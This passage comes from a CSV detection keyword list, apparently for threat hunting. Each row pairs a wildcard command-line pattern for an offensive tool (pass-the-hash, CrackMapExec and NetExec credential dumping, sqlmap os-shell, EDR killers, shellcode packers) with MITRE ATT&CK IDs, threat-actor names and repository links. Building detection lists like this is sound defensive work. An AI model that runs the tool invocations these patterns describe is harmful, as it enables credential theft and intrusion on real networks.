TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","0","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z" +"* -Type SMBClient -Target * -TargetExclude * -Username * -Hash *","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" +"* -Type SMBEnum -Target * -TargetExclude * -Username * -Hash *","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" +"* -Type SMBExec -Target * -TargetExclude * -Username * -Hash *","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" +"* -type user -search * -DomainController * -Credential * -list yes*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-SPN.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -Type WMIExec -Target * -TargetExclude * -Username * -Hash *","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1345","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" +"* -u * -d * --dc-ip * -k --no-pass --target * --action ""list""*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" +"* -u * --local-auth*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -u * -p * --lusers*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -u * -p * -M handlekatz*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -u * -p * -M nanodump*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -u * -p * -M ntdsutil*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* -u * -p * --sam","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -u * -p * --shares*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -u * -p *--pass-pol*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* -u *http* --dbs","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* -u *http* --os-shell*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* -u FUZZ *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -u http* -f *.dll * -p *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"* -U msf -P msf *","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","0","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" +"* -u wordlist * wordlist_uniq_sorted*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","0","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" +"* uberfile.py 
*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* ubiquiti-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --unconstrained-users*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","0","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" +"* unDefender.exe*","offensive_tool_keyword","unDefender","Killing your preferred antimalware by abusing native symbolic links and NT paths.","T1562.001 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/APTortellini/unDefender","1","0","N/A","10","4","309","78","2022-01-29T12:35:31Z","2021-08-21T14:45:39Z" +"* -unhook -antidebug * -self -sleep*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 
- T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -unhook -syscalls -obfuscate *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" 
+"* --unhook-method * --dont-unload-driver * --dump-output *","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"* unicorn.py*","offensive_tool_keyword","unicorn","Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory","T1059.001 - T1055.012 - T1027.002 - T1547.009","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tools","https://github.com/trustedsec/unicorn","1","0","N/A","N/A","10","3503","839","2023-09-15T05:43:27Z","2013-06-19T08:38:06Z" +"* --union-char *GsFRts2*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* unittest.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* unusual-port.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* upnp-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* uptime-agent-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -UrbanBishop -Command *","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"* --url * --attacker *","offensive_tool_keyword","POC","VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)","T1068 - T1190.001 - T1210.002 - T1059.001 - T1059.003 - T1190 - T1569.002","TA0005 - TA0002 - TA0001 - TA0040 - TA0043","N/A","N/A","Exploitation tools","https://github.com/sinsinology/CVE-2023-20887","1","0","N/A","N/A","3","219","44","2023-06-13T14:39:17Z","2023-06-13T13:17:23Z" +"* --url --password 
SIMPLEPASS*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" +"* -urlcache */debase64/*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* url-snarf.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* Use-DarkHotel*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"* -user * --passwordlist *","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z"
+"* userenum * --dc *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"* -Username * -Hash * -Command *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SMBExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* -Username * -Password * -Command * -LogonType *","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z"
+"* --UserName * --Password * --Payload *.exe*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege 
Escalation","https://github.com/cnotin/SplunkWhisperer2","1","0","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z"
+"* -UserPersistenceOption *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* --user-spns*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - 
TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","0","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z"
+"* UUID_bypass.py*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z"
+"* -VaultElementPtr *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - 